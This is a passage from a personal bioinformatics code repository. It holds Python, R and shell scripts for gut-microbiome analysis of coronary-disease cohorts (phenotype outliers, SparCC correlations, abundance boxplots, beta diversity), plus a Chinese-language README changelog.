group_dict[group.columns.values[0]][head[index]], file=out) \n else:\n print(line[0] + '\\t'+ \"1e-06\" + '\\t' + group_dict[group.columns.values[0]][head[index]], file=out) \n \n"
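# Hedged refactor sketch (not part of the original analysis): the per-level z-score blocks above repeat one pattern and could be folded into a helper, e.g. (names here are assumptions):\n# def group_zscore(abd_file, group, names=('NCA', 'sCAD', 'AMI')):\n#     z = pd.read_table(abd_file, index_col=0).apply(zscore, axis=1).T\n#     return pd.concat([z.loc[group.loc[group['Description'] == g].index].mean().to_frame(name=g) for g in names], axis=1)\n# z_merge = group_zscore('Phylum.rabun.xls', group)\n"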
},
{
"alpha_fraction": 0.5820484757423401,
"alphanum_fraction": 0.6161894202232361,
"avg_line_length": 44.20000076293945,
"blob_id": "cdf96f8f4f2e47f02ee0d6c6e0471cb5bb72b15d",
"content_id": "e32f9cbae38b7f7776819313e21181b8da4940c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2076,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 40,
"path": "/Phenotype/abnormal_values.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 统计表型信息的缺失值和异常值,这里异常值的定义为 大于第三分位数 + 1.5 倍的四分位距或者小于第一分位数的 - 1.5 倍的四分位距;\n#20190505 更新,阜外项目的表型信息记录\nimport pandas as pd \ndt = pd.read_table('phenotype.xls', index_col = 0)\n# 缺失值的统计\n# >10 样品以上缺失的表型信息 \nnan_dt = dt.loc[:,dt.isnull().sum() > 10]\ngroup_dt = dt['Group'].to_frame()\n#type(group_dt)\ngroup_dt\ndt_merge = pd.concat([nan_dt, group_dt], axis=1)\n# 统计各组的异常值数目\nprint('===NCA n=42 ===')\nprint(dt_merge.loc[dt_merge['Group'] == 'NCA'].isnull().sum())\ndt_merge.loc[dt_merge['Group'] == 'NCA'].isnull().sum().to_frame(name = 'Nan Number(n = 42)').to_csv('NCA_NaN.txt', sep = \"\\t\")\nprint('\\n===sCAD n=54 ===')\nprint(dt_merge.loc[dt_merge['Group'] == 'sCAD'].isnull().sum())\ndt_merge.loc[dt_merge['Group'] == 'sCAD'].isnull().sum().to_frame(name = 'Nan Number(n = 54)').to_csv('sCAD_NaN.txt', sep = \"\\t\")\nprint('\\n===AMI n=52 ===')\nprint(dt_merge.loc[dt_merge['Group'] == 'AMI'].isnull().sum())\ndt_merge.loc[dt_merge['Group'] == 'AMI'].isnull().sum().to_frame(name = 'Nan Number(n = 52)').to_csv('AMI_NaN.txt', sep = \"\\t\")\n#nan_dt\n#pd.concat[[dt.loc[:,'Group'],dt.loc[:,dt.isnull().sum() > 10]]]\n#后边的结果需要继续优化 20190506\n\n## 统计离群值\ndt = pd.read_table('phenotype.xls', index_col = 0)\nfloat_dt = dt.loc[:,dt.dtypes == \"float64\"] # 只处理浮点型变量\nimport numpy as np\nfor item in float_dt.columns: \n Percentile = np.nanpercentile(dt[item],[0,25,50,75,100])\n IQR = Percentile[3] - Percentile[1]\n UpLimit = Percentile[3] + IQR*1.5 #最大以及最小值(下行)\n DownLimit = Percentile[1] - IQR*1.5\n abn_number = ((dt[item] > UpLimit) | (dt[item] < DownLimit)).sum()\n if abn_number > 0:\n target_dt = dt[item].loc[(dt[item] > UpLimit) | (dt[item] < DownLimit)].to_frame(name=item)\n filename = item + '_abnormal_values.txt'\n outpath = 'Abnormal_value/' + filename\n target_dt.to_csv(outpath, sep = '\\t') \n"
},
{
"alpha_fraction": 0.6568182110786438,
"alphanum_fraction": 0.6625000238418579,
"avg_line_length": 32.80769348144531,
"blob_id": "25cb91c1b500702ff7c485ea3ac21c5d36fa58a4",
"content_id": "33824472d7d830cd6abc3c4bdb667995f48e42bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 966,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 26,
"path": "/article.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# calculate the frequency of occurence of ciations in an article\n# 统计文章中引文出现的次数,需要提供引文和正文内容,引文格式为 [数字],需要的文件在 Data 目录下;\nimport re\nquotation = dict()\nwith open('quotation.txt', 'r') as IN:\n\tfor line in IN:\n\t\tline = line.strip('\\n')\n\t\tmatch = re.search('(\\d+)\\. (.*)', line)\n\t\tif match:\n\t\t\tnumber = match.group(1)\n\t\t\tarticle_name = match.group(2)\t\n\t\t\tquotation[int(number)] = article_name\n\nfrom collections import defaultdict\ncounts = defaultdict(int) #values will initialize to 0\nwith open('content.txt', 'r') as IN:\n\tfor line in IN:\n\t\tmatch = re.findall('\\[(\\d+)\\]',line)\n\t\tif match:\n\t\t\tfor x in match:\n\t\t\t\tcounts[int(x)] += 1 \nwith open('results.txt', 'w') as out:\n\tprint('citation_number\\tfrequency of occurrence\\tarticle_title', file = out)\n\tfor key in sorted(counts.keys()):\n\t\tprint(str(key) + '\\t' + str(counts[key]) + '\\t' + quotation[key], file = out)\n\n"
},
{
"alpha_fraction": 0.7358490824699402,
"alphanum_fraction": 0.7433962225914001,
"avg_line_length": 28.44444465637207,
"blob_id": "432ded91e3cc7964cfa83c819f4faa6a5274cab5",
"content_id": "1b1d42a2ddf4fb385d898ed9ace94c06bbe40aa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 9,
"path": "/data_delivery_scps.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 和 dta_delivery_scp.expect 联用,实现批量传输\n#! /bin/bash\nlist_file=$1 #file path each line\ndest_dir=$2 #the destination directory\ncat $list_file | while read line\ndo\necho \"Processing file:scp the $line to $dest_dir\"\nexpect data_delivery_scp.expect $line $dest_dir\ndone\n"
},
{
"alpha_fraction": 0.6629688143730164,
"alphanum_fraction": 0.6925514936447144,
"avg_line_length": 46.32500076293945,
"blob_id": "582a08d7f97973af1ba79be8ac41edb5aa8e6a6e",
"content_id": "d0edaccbdc34f930bebc2bbea56dd9fb8cc3e50e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2033,
"license_type": "no_license",
"max_line_length": 280,
"num_lines": 40,
"path": "/Correlation/SparCC.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#使用 SparCC 计算相关性,https://bitbucket.org/yonatanf/sparcc/overview\n##usage: python /Users/tongxueer/Documents/R/run_sparcc.py example/fake_data.txt fake outdir\n### 运行该脚本比较麻烦...需要特定的 Python 版本以及相应的库版本,查到了使用 conda 进入虚拟环境的解决办法(还是挺方便的,除了每次都得进入比较麻烦)\n### \n$ conda create --name SparCC python=2.6.9\n$ source activate SparCC\n$ conda install python-dateutil=2.4.2\n$ conda install numpy=1.9.2 pandas=0.16.2\n$ conda install libcxx\n####\n\nimport sys,os\nabdfile = sys.argv[1] #/Users/tongxueer/Documents/R/p_0.05.new.name.profile.xls\nprefix = sys.argv[2] # mgs\noutdir = sys.argv[3] # ./\nif not os.path.exists(outdir):\n\tos.makedirs(outdir)\n\nsparcc = outdir + '/' + prefix + '_sparcc.txt'\ncov_sparcc = outdir + '/' +prefix + '_cov_sparcc.txt'\nos.system('python /Users/tongxueer/Documents/R/yonatanf-sparcc-3aff6141c3f1/SparCC.py ' + abdfile + ' -c ' + sparcc + ' -v ' + cov_sparcc)\n\n#repeat 100\noutput = outdir + '/pseudo'\nif not os.path.exists(output):\n\tos.makedirs(output)\nos.system('python /Users/tongxueer/Documents/R/yonatanf-sparcc-3aff6141c3f1/MakeBootstraps.py ' + abdfile + ' -p ' + output + '/ -t permuted_#')\n\ncorr_dir = outdir + '/boot_' + prefix + '_corr'\nif not os.path.exists(corr_dir):\n\tos.makedirs(corr_dir)\ncov_dir = outdir + '/boot_' + prefix + '_cov'\nif not os.path.exists(cov_dir):\n\tos.makedirs(cov_dir)\nos.system('for i in `seq 0 99`; do python /Users/tongxueer/Documents/R/yonatanf-sparcc-3aff6141c3f1/SparCC.py ' + output + '/permuted_$i -c ' + corr_dir + '/simulated_sparcc_$i.txt -v ' + cov_dir + '/simulated_sparcc_$i.txt >> ' + outdir + '/' + prefix + '_boot_sparcc.log; done')\n\npvals_dir = outdir + '/' + prefix + '_pvals'\nif not os.path.exists(pvals_dir):\n\tos.makedirs(pvals_dir)\nos.system('python /Users/tongxueer/Documents/R/yonatanf-sparcc-3aff6141c3f1/PseudoPvals.py ' + sparcc+ ' ' + corr_dir + '/simulated_sparcc_#.txt 100 -o ' + pvals_dir + '/one_sided.txt -t one_sided')\n"
},
{
"alpha_fraction": 0.6320919394493103,
"alphanum_fraction": 0.6619144678115845,
"avg_line_length": 51.07575607299805,
"blob_id": "8c79a5ca0016a1d435c7dbc054ade5407dc86e68",
"content_id": "5613b41037ba6963c5299f4e0e647a1c293b1781",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6924,
"license_type": "no_license",
"max_line_length": 490,
"num_lines": 132,
"path": "/CHD/boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#直接画患者和健康人的差异物种, 门水平\nlibrary(ggplot2)\nlibrary(dplyr)\ndt = read.table('phylum_boxplot.txt', header=T)\n\ngroup_list = \"NCA:sCAD:AMI\"\ncolor_list = \"24af2d:ea5e74:e80211\"\n#tax_list = \"Firmicutes:Bacteroidetes:Proteobacteria:Actinobacteria:Verrucomicrobia:Euryarchaeota:Viruses_noname:Fusobacteria:Synergistetes:Candidatus_Saccharibacteria\"\ntax_list = \"Verrucomicrobia:Synergistetes\"\nlegend_list = c(unlist(strsplit(group_list, \":\")))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\ntax_order = c(unlist(strsplit(tax_list, \":\")))\n\ndt$group_order<-factor(dt$Group, legend_list)\ndt$ID_order<-factor(dt$ID, tax_order)\np = ggplot(dt,aes(x = ID_order, y = log10(Abd))) +\ngeom_boxplot(aes(fill = factor(group_order)), fatten = 1, lwd = 0.5, outlier.size = 0.5, position = position_dodge(0.8)) +\nlabs(x ='', y = \"Relative~abundance\", fill = '', color = '', size = 10 ) +\nscale_fill_manual(values = color_var) + \ntheme(\n axis.text = element_text(colour = 'black', size = 10),\n axis.text.x = element_text(angle = 0),\n #axis.text.x = element_text(hjust = 1, angle = 0), #phylum\n# axis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #genus\n# axis.text.x = element_text(hjust = 1, face = 'italic', angle = 60), #species\n axis.title.y = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n #legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 8),\n legend.key.width = unit(0.15, 'in'),\n legend.key.height = unit(0.15, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n)\npostscript(paste(\"phylum_boxplot.eps\",sep=\"\"), width = 6, height=4)\npdf(paste(\"phylum_boxplot.pdf\",sep=\"\"), width = 6, height=4)\np\ndev.off()\n\n\n## 种水平\nlibrary(ggplot2)\nlibrary(dplyr)\ndt = read.table('species_boxplot.txt', header=T)\n\ngroup_list = \"NCA:sCAD:AMI\"\ncolor_list = \"24af2d:ea5e74:e80211\"\ntax_list = \"Alistipes_onderdonkii:Coprococcus_sp_ART55_1:Megasphaera_unclassified:Dialister_succinatiphilus:Lactobacillus_amylovorus:Lactobacillus_salivarius:Lactobacillus_mucosae:Lactobacillus_crispatus:Enterobacter_cloacae:Coprococcus_eutactus:Phascolarctobacterium_succinatutens:Bifidobacterium_bifidum:Citrobacter_unclassified:Citrobacter_freundii:Prevotella_stercorea:Sutterella_wadsworthensis:Prevotella_bivia:Fusobacterium_mortiferum:Prevotella_disiens:Elizabethkingia_unclassified\"\nlegend_list = c(unlist(strsplit(group_list, \":\")))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\ntax_order = c(unlist(strsplit(tax_list, \":\")))\n\ndt$group_order<-factor(dt$Group, legend_list)\ndt$ID_order<-factor(dt$ID, tax_order)\np = ggplot(dt,aes(x = ID_order, y = log10(Abd))) +\n geom_boxplot(aes(fill = factor(group_order)), fatten = 1, lwd = 0.5, outlier.size = 0.5, width = 0.8, position = position_dodge(0.8)) +\n # labs(x ='', y = expression(Relative~abundance~(log['10'])), fill = '', color = '', size = 10 ) +\n labs(x ='', y = \"Relative abundance\", fill = '', color = '', size = 10 ) +\n geom_vline(xintercept=c(14.5), linetype=\"dotted\") + \n scale_fill_manual(values = color_var) +\n theme(\n axis.text = element_text(colour = 'black', size = 10),\n # axis.text.x = element_text(angle = 0),\n #axis.text.x = element_text(hjust = 1, angle = 0), #phylum\n # axis.text.x = element_text(hjust = 1, 
face = 'italic', angle = 45), #genus\n axis.text.x = element_text(hjust = 1, face = 'italic', angle = 60), #species\n axis.title.y = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n #legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 10),\n legend.key.width = unit(0.2, 'in'),\n legend.key.height = unit(0.2, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n )\n#postscript(paste(\"species_boxplot.eps\",sep=\"\"), width = 8, height=5)\npdf(paste(\"species_boxplot.pdf\",sep=\"\"), width = 8, height=4)\np\ndev.off()\n\n## 五个种水平\nlibrary(ggplot2)\nlibrary(dplyr)\ndt = read.table('five_species_boxplot.txt', header=T)\n\ngroup_list = \"NCA:sCAD:AMI\"\ncolor_list = \"24af2d:ea5e74:e80211\"\n#tax_list = \"Alistipes_onderdonkii:Coprococcus_sp_ART55_1:Megasphaera_unclassified:Dialister_succinatiphilus:Lactobacillus_amylovorus:Lactobacillus_salivarius:Lactobacillus_mucosae:Lactobacillus_crispatus:Enterobacter_cloacae:Coprococcus_eutactus:Phascolarctobacterium_succinatutens:Bifidobacterium_bifidum:Citrobacter_unclassified:Citrobacter_freundii:Prevotella_stercorea:Sutterella_wadsworthensis:Prevotella_bivia:Fusobacterium_mortiferum:Prevotella_disiens:Elizabethkingia_unclassified\"\ntax_list = \"Alistipes_onderdonkii:Lactobacillus_mucosae:Lactobacillus_crispatus:Pyramidobacter_piscolens:Atopobium_parvulum\"\nlegend_list = c(unlist(strsplit(group_list, \":\")))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\ntax_order = c(unlist(strsplit(tax_list, \":\")))\n\ndt$group_order<-factor(dt$Group, legend_list)\ndt$ID_order<-factor(dt$ID, tax_order)\np = ggplot(dt,aes(x = ID_order, y = log10(Abd))) +\n geom_boxplot(aes(fill = factor(group_order)), fatten = 1, lwd = 0.5, outlier.size = 0.5, width = 0.8, position = position_dodge(0.8)) +\n # labs(x ='', y = expression(Relative~abundance~(log['10'])), fill = '', color = '', size = 10 ) +\n labs(x ='', y = \"Relative abundance\", fill = '', color = '', size = 10 ) +\n #geom_vline(xintercept=c(14.5), linetype=\"dotted\") + \n scale_fill_manual(values = color_var) +\n theme(\n axis.text = element_text(colour = 'black', size = 10),\n # axis.text.x = element_text(angle = 0),\n #axis.text.x = element_text(hjust = 1, angle = 0), #phylum\n # axis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #genus\n axis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #species\n axis.title.y = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n #legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 10),\n legend.key.width = unit(0.2, 'in'),\n legend.key.height = unit(0.2, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n )\n#postscript(paste(\"species_boxplot.eps\",sep=\"\"), width = 8, height=5)\npdf(paste(\"five_species_boxplot.pdf\",sep=\"\"), width = 8, height=4)\np\ndev.off()\n"
},
{
"alpha_fraction": 0.6129523515701294,
"alphanum_fraction": 0.6434285640716553,
"avg_line_length": 49.480770111083984,
"blob_id": "bcf2841636e0837504b7b277caf523dd30c3431a",
"content_id": "02028c1ef7910ab9a1b691db1d1f244cea093217",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2657,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 52,
"path": "/CHD/beta.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# beta, 种, 画 beta 的箱线图,同时标注显著性差异\ninput = 'intra_distance.txt' # alpha diversity file, including number and shannon\noutdir = './beta/'\ngroup_list = 'sCAD:AMI:sCAD-AMI' # E-liquid:Cigarette\ncolor_list = 'ea5e74:aa75b3:08519C' # 487eb3:d2382c\ndt = read.table(input, header = T,sep = '\\t', row.names = 1, check.names = F)\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nlegend_list = unlist(strsplit(group_list, \":\"))\nfilename_prefix= gsub(\":\", \"_\", group_list)\n\nlibrary(ggplot2)\nlibrary(ggpubr)\ndt$group = factor(dt$group, levels=legend_list)\n\ndiff = compare_means(distance ~ group, dt, method = \"wilcox.test\") ## default wilcox.test\nwrite.table(diff,file = paste(outdir,filename_prefix,\"_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) {\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n\tmy_comparisons[[row]] = diff_group\n}\nplot = ggplot(dt,aes(x=group, y=distance)) + \n geom_violin(aes(fill=group)) + \n geom_boxplot(width = 0.2) + \n scale_fill_manual(values= color_var) +\n stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.04,0.13,0.09) + max(dt$distance)) + scale_color_manual(values= color_var) + \n labs(x=\"\", y = \"Bray distance\") + scale_y_continuous(limits = c(min(dt$distance), max(dt$distance)*1.15)) +\n theme(axis.text = element_text(colour = 'black', size = 12),\n #axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 12),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.1,0.1, 0.1, 0.1), 'in')) #top right bottom left\n} else {\nplot = ggplot(dt,aes(x=group, y=distance, colour=group)) + geom_boxplot() + scale_color_manual(values= color_var) + labs(x=\"\", y = \"bray distance\") +\n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3,0.3, 0.3, 0.3), 'in'))\n}\n#output\npdf(paste(outdir,filename_prefix,\"_beta_boxplot.pdf\",sep=\"\"),width=3.2,height=3)\nplot\ndev.off()\n"
},
{
"alpha_fraction": 0.6715542674064636,
"alphanum_fraction": 0.7601172924041748,
"avg_line_length": 32.21428680419922,
"blob_id": "f5f36d15ed4c5812664036e4b669aaeae0759e0b",
"content_id": "739c711e67b5dffb79bdc748880f881e49e2f94d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9347,
"license_type": "no_license",
"max_line_length": 305,
"num_lines": 154,
"path": "/README.md",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# Bioinformatics\n\n***\n20180626 diversity.py \n用 python3 的 pandas 计算了基于丰度表的丰富度和 shannon 物种多样性指数,相比较之前写脚本遍历计算,基于数据框的运算爽很多. 命名为之 diversity.py,目前只能计算两个,以后看情况再加咯.\n\n***\n20180627 2017年影响因子 20180626.xlsx \n增加了刚出的截止至 2017 年杂志的影响因子(Journal Citation Reports).\n\n***\n20180710 NCBIscrapy.py \n利用 python3 的爬虫帮别人爬取 NCBI 网站上的一些东西,比较简单,留作记录.\n\n***\n20180714 geneInsample.py \n得到基因丰度表以后,计算基因在样本中的存在情况,如至少在 10% 的样本存在的基因有多少,20%,30%... 以此类推.\n并且按照需要输出低于某一阈值的基因 ID, 用来后续分析的过滤,如在少于 10% 样品中存在的基因 ID. \n\n***\n20180714 numToid.py \n接上一步,过滤出来至少在 10% 样品中存在的基因编号后,需要得到相应的基因 ID (因为之前基因长度文件配置的缘故,现在要替换回来). \n没有用字典,试着用 pandas 的 concat 功能, 将两个数据集按照行索引取交集合并,提取编号和与之对应的 ID, 单独输出到文件. \n\n***\n20180718 补充 geneInsample.py \n修改 geneInsample.py, 使得脚本能输出高于某一阈值的基因丰度表,如大于 10% 样本中存在的所有基因的丰度表,用于物种丰度表的表征. \n\n***\n20180718 \nprofileNorm.R: 将上一步生成的物种丰度文件(用别人的脚本生成)归一化处理,即每列加和数字等于 1. \nplotIdGenerate.py: 统计丰度表中,所有大于 1(1%)的物种的 ID, 画柱状图时, 需要把在所有样品中小于 1% 的物种合并为 others, 想了半天才想起来这个脚本的功能,必须得做好日志文件呀. \n\n***\n20180725 \nsmall_script.py 统计基因注释文件里,注释到门,属,种水平的基因个各有多少,全程用了 pandas, 用到了 pandas 的切分某列,将 None 替换为 Nan, 按照列计数,还有 unique 功能. \n\n***\n20180726 \nbraycurtis.py 根据丰度文件计算 bray-curtis 距离,生成样品之间的距离矩阵,没有找到 python3 比较便捷的方法,所以自己用笨的办法写了脚本, 待完善;\n\n***\n20180730 \nSplitbyRownames.py 根据行名包含哪些字符将数据框分开,R 对应的功能没有找到,但是 pyhton3 有,R 目前只知道根据行名筛选的(select)功能,待完善; \n\n***\n20180731 \nheatmap.R 根据计算出来的 braycurtis 距离矩阵,画热图,并且进行按照分组进行标识; \n参考链接:[R语言绘制热图——pheatmap - CSDN博客](https://blog.csdn.net/sinat_38163598/article/details/72770404) \n\nboxplot.R 箱线图与差异检验(wilcox.test) \n\n*** \n20180805 \npermutation.R 置换检验, Permutation test 置换检验是 Fisher于20世纪30年代提出的一种基于大量计算(computationally intensive),利用样本数据的全(或随机)排列,进行统计推断的方法,因其对总体分布自由,应用较为广泛,特别适用于总体分布未知的小样本资料, 以及某些难以用常规方法分析资料的假设检验问题。在具体使用上它和Bootstrap Methods类似,通过对样本进行顺序上的置换,重新计算统计检验量,构造经验分布,然后在此基础上求出P-value进行推断,简单记录; \n参考链接:[置换检验(R语言实现)](https://blog.csdn.net/zhouyijun888/article/details/69524200) \n\n***\n20180815\nPCoA.R 看了好长时间的文献后,终于可以写脚本了,写好了 PCoA 分析,这个貌似网上不怎么能找得到比较好的教程,所以花费时间比较久; \n新建了一个 Data 文件夹,用来放置脚本处理的源文件,方便以后的重现,毕竟脚本多了可能记不起来了; \n还是写脚本比较舒服; \n\n***\n20180816 \nanosim.R anosim 分析,ANOSIM (analysis ofsimilarities) 分析,也叫相似性分析,主要是用于分析高维度数据组间,相似性的统计方法,比如我们经常做完PCoA、NMDS等降维分析的时候(如下图),看着组,间样本是区分开的,但是缺少一个P值,说明这种差异到底是否显著。 \n参考链接:[什么是ANOSIM分析](http://www.360doc.com/content/18/0113/21/33459258_721682039.shtml)\n\n***\n20180823 \nupset.R 花了点儿时间摸索了个软件,可以代替 venn 图查看多个数据集的交集情况, [软件参考链接](http://caleydo.org/tools/upset/) 目前实现的功能还比较简单, 因为暂且不需要多复杂。 \n\n*** \n20180824 \n增加 calypso.py 用来将物种丰度表的结果文件处理成 calypso 软件可以上传的格式; \n\n***\n20180920 \n好久没更新,因为没怎么写代码 \n重新写了 PCA 的 R 代码,增加两个主坐标的差异检验,并且标注显著差异的值,将三张图输出在一个 PDF; \n同时会更新 PCoA.R 的代码; \n部分参考链接: \n[R语言可视化学习笔记之添加p-value和显著性标记 | Logos](https://ytlogos.github.io/2017/06/25/R%E8%AF%AD%E8%A8%80%E5%8F%AF%E8%A7%86%E5%8C%96%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%B7%BB%E5%8A%A0p-value%E5%92%8C%E6%98%BE%E8%91%97%E6%80%A7%E6%A0%87%E8%AE%B0/) \n[R语言grid包使用笔记——viewport](https://blog.csdn.net/vivihe0/article/details/47188329) \n[将多张图输出到一个或者多个 PDF 上](http://www.sthda.com/english/articles/24-ggpubr-publication-ready-plots/81-ggplot2-easy-way-to-mix-multiple-graphs-on-the-same-page/) \n\n***\n20180924 \n乘着中秋放假,增加 adonis 分析的脚本 adonis.R, 比较简单,后边肯定还得继续完善; \n祝自己中秋快乐咯,需要努力学习; \n只剩下钢琴陪我谈了一天; \n参考链接: [RPubs - Multivariate analyses of variance](https://rpubs.com/collnell/manova) \n\n***\n20180926 \n增加了帮 Neko 写的一个脚本 run_Combine_gvcf.py,她要走啦,留作纪念好了 \n\n***\n20181008 \n修改了 PCA 和 PCoA 的脚本,之前没有考虑到差异结果没有显著的情况,导致报错; \n果然不断的迭代才是好的方法,你不可能一次性把所有情况考虑清楚的。不过第一次还是尽可能的多考虑; \n\n*** \n20181022 \n越来越忙了,增加了批量生成 metawrap 
组装的脚本 getScript.py,果然需要批量生成..任何手动的东西真是太可恶了! \n\n*** \n20181023 \n增加了 anova 的脚本 anova.R,包括方差齐性检验,正态分布检验,mean+se 的柱状图输出。断断续续终于写完了,还不是很完善,也没有弄成通用的,因为时间\n不怎么够用,等下下次需要用的时候再改吧。 写得过程中参考了很多有用的博客,如 [One-Way ANOVA Test in R - Easy Guides - Wiki - STHDA](http://www.sthda.com/english/wiki/one-way-anova-test-in-r), [Plotting means and error bars (ggplot2)](http://www.cookbook-r.com/Graphs/Plotting_means_and_error_bars_(ggplot2)/), 非常感谢~ 同时好多想要的功能也没有完善,后续有需要再修改吧。 \n\n*** \n20181024 \n增加了一个 python 脚本,SelectandMerge.py, 项目分析中用到; \n\n*** \n20190420 \n久违的更新,距离上一次已经 6 个月了... 自己仍旧没有取得特别大的进步,这次是增加了多元线性回归的一个脚本 multiple_liner.R,勉强把这个东西大致弄懂了,待完善,要去吃晚饭.. \n\n*** \n20200311 \n将近一年了... 没有写这个文档,回头看还是蛮有感触的... 这大概是记录的意义所在吧~ \n增加了 paper_information.py 脚本,用于输入文献官网网址,爬取杂志名称,发表时间,影响因子等信息,待完善补充; \n\n*** \n2020年3月11日 下午9:38 \n良心发现,加快更新(其实是因为在整理项目); 增加了表型处理的脚本 abnormal_values.py ,包括缺失值和异常值,待完善; \n\n\n*** \n2020年3月13日 上午8:50 \n增加了三组差异检验箱线图的显著性标识生成脚本 diff_label.py, 待完善;芒格说,每天进步一点点,加油~ \n\n \n*** \n2020年3月15日 上午11:08 \n增加了三个脚本,分别是离散型变量表型的差异检验:cat_diff.R, 以及其结果整理的脚本:cat_result.py, 还有连续型表型变量的差异检验的结果整理:con_result.py, 待完善; 我说:即使状态再差,也有自己能做的事情; \n\n*** \n2020年3月15日 下午9:19 \n增加了倾向性评分脚本 propensity_score.R 待完善; 相应的博客文章见这里[倾向性评分 | Propensity score](https://nonewood.github.io/2020/03/15/propensity-score/) \n是一个充实的周末没错了... 略累... 待会儿去画画; \n\n*** \n2020年4月10日 \n因为项目需要,增加脚本 multi_roc.R ,用于表型信息的 ROC 分类,比较简单,待优化,博客文章见这里[表型信息的ROC曲线|multi_roc.R](https://nonewood.github.io/2020/04/10/phenotype-roc/); \n\n*** \n2020年5月11日 \n增加了文献信息爬虫脚本,advanced_paper_information.py, 只需提供文献题目,可爬取影响因子,发表时间,杂志名称等信息;\n\n*** \n2020年7月13日 \n整理脚本的时候,增加了之前写好的 eastmoney.py ,很粗糙的版本...\n"
},
{
"alpha_fraction": 0.6109113693237305,
"alphanum_fraction": 0.6227532029151917,
"avg_line_length": 40.12173843383789,
"blob_id": "764a041e2a55dc0ff1871eb6c56928b6885402f5",
"content_id": "03110c6a6f87120d4168d595d1db317ca371a4e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4729,
"license_type": "no_license",
"max_line_length": 314,
"num_lines": 115,
"path": "/Kraken2/kraken.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport pandas as pd\nimport argparse,os,shutil,re\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nGenerate the profile files(kingdom, phylum, genus..) for all samples of kraken2 results.\nExample: python3 kraken.py -i /ifswh1/BC_COM_P2/F18FTSNCWLJ0169/HUMnzsM/HUMrfvM/metawrap/Kraken/sampleID -d /ifswh1/BC_COM_P2/F18FTSNCWLJ0169/HUMnzsM/HUMrfvM/metawrap/Kraken/KRAKEN -l kingdom,phylum,class,order,family,genus,species -o /ifswh1/BC_COM_P2/F18FTSNCWLJ0169/HUMnzsM/HUMrfvM/metawrap/Kraken/KRAKEN/Outdir\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--sampleID', help = \"the sample id list file, tab separated.\")\nparser.add_argument('-d','--directory', help = \"the kraken2 output directory.\")\nparser.add_argument('-l','--level', help = \"choose the taxonomic levels for profile files, semicolon(,) separated. (optional:kingdom,phylum,class,order,family,genus,species), 